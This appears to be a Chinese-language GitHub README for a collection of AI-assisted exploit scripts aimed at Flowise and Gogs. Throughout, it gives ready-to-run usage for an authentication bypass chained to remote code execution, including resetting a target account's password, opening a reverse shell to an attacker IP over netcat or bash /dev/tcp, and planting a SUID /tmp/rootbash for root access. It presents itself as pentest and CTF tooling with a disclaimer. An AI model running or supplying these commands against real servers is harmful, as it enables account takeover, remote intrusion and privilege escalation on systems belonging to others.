0xsyr0/AI-Exploit-Forge-Collection

GitHub: 0xsyr0/AI-Exploit-Forge-Collection

一个聚焦AI辅助的利用脚本集合,解决在授权测试与竞赛中快速生成与验证漏洞利用链的需求。

Stars: 1 | Forks: 0

# AI Exploit Forge 集合 一个在渗透测试、红队行动和 CTF 竞赛期间开发的 AI 辅助利用脚本 curated collection。 ## 免责声明 本仓库中的所有利用脚本仅限用于授权的安全测试、渗透测试、CTF 竞赛以及教育目的。请勿在您未拥有或未经明确书面许可测试的系统上使用任何工具。作者不对误用承担任何责任。 ## 利用脚本 | CVE | 软件 | 版本 | CVSS | 类型 | 脚本 | |-----|------|------|------|------|--------| | CVE-2025-58434 + CVE-2025-59528 | Flowise | <= 3.0.5 | 10.0 严重 | 认证绕过 + 远程代码执行 | `CVE-2025-59528.py` | | CVE-2024-44625 | Gogs | <= 0.13.0 | 8.8 高 | 路径遍历 + 远程代码执行 | `CVE-2024-44625.py` | ### CVE-2025-58434 + CVE-2025-59528 — Flowise 认证绕过 + 远程代码执行 #### 使用方法 在运行利用脚本之前启动监听器: ``` nc -lvnp ``` ``` # 基本用法(节点 shell,默认模式) python3 CVE-2025-59528.py -u http:// -e -i -p # 使用虚拟主机头 python3 CVE-2025-59528.py -u http:// -v flowise.example.com -e admin@example.com -i 10.10.14.1 -p 4444 # 设置特定密码而非随机 python3 CVE-2025-59528.py -u http:// -e admin@example.com -pw 'NewPass123!' -i 10.10.14.1 -p 4444 # bash /dev/tcp 回退模式 python3 CVE-2025-59528.py -u http:// -e admin@example.com -i 10.10.14.1 -p 4444 -m bash # 禁用 TLS 验证 python3 CVE-2025-59528.py -u https:// -e admin@example.com -i 10.10.14.1 -p 4444 -k ``` #### 选项 | 参数 | 描述 | |------|------| | `-u`, `--url` | Flowise 基础 URL(必需) | | `-e`, `--email` | 目标账户邮箱(默认:`user@example.com`) | | `-pw`, `--password` | 重置后设置的密码(未提供时随机生成) | | `-v`, `--vhost` | 虚拟主机头覆盖 | | `-i`, `--lhost` | 反向 shell 的攻击者 IP(必需) | | `-p`, `--lport` | 反向 shell 的攻击者端口(必需) | | `-m`, `--mode` | Shell 模式:`node`(默认)或 `bash` | | `-k`, `--no-verify` | 禁用 TLS 证书验证 | #### 依赖项 ``` pip install requests ``` ### CVE-2024-44625 — Gogs 符号链接路径遍历 + 远程代码执行 #### 使用方法 ``` python3 CVE-2024-44625.py # 示例 python3 CVE-2024-44625.py http://127.0.0.1:3001 gogsadmin P@ssword123 ``` 成功利用后: ``` ls -la /tmp/rootbash /tmp/rootbash -p ``` #### 注意事项 - 运行利用脚本前必须先生成 API 令牌:Gogs UI → Settings → Applications → Generate Token - 必须安装 `git` 并确保其在攻击机的 `$PATH` 中可用 - 默认载荷会在 `/tmp/rootbash` 处创建一个 `/bin/bash` 的 SUID 副本 —— 如需修改,请在脚本中调整 `PAYLOAD` #### 依赖项 ``` pip install requests ```
标签:AI安全, AI辅助, Chat Copilot, CVE-2024-44625, CVE-2025-58434, CVE-2025-59528, Flowise, Gogs, RCE, 人工智能安全, 协议分析, 合规性, 字符串匹配, 授权测试, 教育用途, 权限提升, 漏洞利用脚本, 红队操作, 网络安全, 脚本工具, 认证绕过, 路径遍历, 逆向工具, 隐私保护